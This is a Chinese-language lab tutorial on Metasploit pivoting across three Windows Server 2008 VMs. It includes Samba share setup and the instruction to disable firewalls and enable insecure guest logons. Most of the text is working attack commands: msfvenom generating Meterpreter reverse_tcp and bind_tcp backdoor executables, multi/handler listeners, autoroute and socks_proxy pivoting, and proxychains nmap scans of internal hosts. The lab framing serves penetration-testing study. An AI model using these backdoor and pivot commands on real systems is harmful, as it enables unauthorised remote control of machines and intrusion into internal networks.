目录
一、环境搭建
1.1 网络配置
准备kali linux虚拟机*1
IP设置
vim /etc/network/interfaces
准备windows2008 R2虚拟机*3
主机1:
其他主机同理。
本次虚拟机环境没有防火墙限制,所以要提前关闭虚拟机的防火墙
1.2 开启文件共享功能
1)创建共享目录
mkdir /home/share
2) kali中开启文件共享需要下载samba
apt install samba
3)修改samba配置文件
vi /etc/samba/smb.conf
文件末尾添加如下内容
[share] #任意名字
comment = lv share #任意名字
path = /home/share # 共享目录
;read only = no # 将共享目录设置为只读【前面加了;,表示这行被注释掉了】
writable = yes # 将共享目录设置为读写
browseable = yes # 显示共享目录下的所有文件
public = yes # 将共享目录设置为公共的
create mask = 0644 # 设置共享目录中的一般文件的默认权限
directory mask = 0755 # 设置共享目录中的目录文件的默认权限
4)启动samba
systemctl enable smb
systemctl enable nmb
systemctl restart smb
systemctl restart nmb
5)查看是否启动成功【active(running)代表启动成功】
systemctl status smb
systemctl status nmb
注 :windows10/11 如果不是专业版或企业版可能无法访问共享目录
注:win10/11有可能没有打开服务,导致无法访问共享
1)启动组策略
win+r运行输入以下内容
gpedit.msc
2)启用来宾登录
计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录
二、MSF配置代理转发
2.1 实现主机1上线
1)生成后门文件
reverse_tcp:反向链接时使用
lhost:kali 主机ip
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.100.108 lport=1111 -f exe >
/home/share/1111.exe
2)生成监听器
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1111
run
3)被攻击主机1运行生成的1111.exe文件
出现meterpreter就证明成功了,可以执行命令验证
ipconfig
这样我们就实现了第一个主机上线的过程了。
2.2 实现主机2上线
1)实现主机1上线
2)在已经上线的主机1上创建代理转发功能
a).查看路由
run autoroute -p
显示 No routes have been added yet 说明没有路由
b).添加路由
run post/multi/manage/autoroute
出现这样的页面就说明添加路由成功了
3)挂起当前会话
background
4)开启代理功能
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1122
run
5)测试代理功能是否可以工作
kali安装proxychains4
apt install proxychains4
修改配置文件
vim /etc/proxychains4.conf
修改之前设置好的端口1122
6)在主机2上安装IIS
7)使用proxychains4测试访问主机2上的IIS
proxychains4 nmap -Pn -sT -p80 10.10.10.2
STATE:open 说明可以访问IIS
8)生成exe文件后门
bind_tcp:正向链接时使用
lhost: 0.0.0.0 指定主机2本机地址
msfvenom -p windows/meterpreter/bind_tcp lhost=0.0.0.0 lport=2222 -f exe >
/home/share/2222.exe
9)生成监控器
background #挂起会话
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.2
set lport 2222
run
10)主机2运行2222.exe
2.3 实现主机3上线
1)实现主机1、2上线
2)生成后门
msfvenom -p windows/meterpreter/bind_tcp lhost=0.0.0.0 lport=3333 -f exe >
/home/share/3333.exe
3)在主机2会话中创建路由
run post/multi/manage/autoroute
4)挂起会话
background
5)主机3正向链接
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 20.20.20.2
set lport 3333
run
这样我们就实现了三台主机上线了。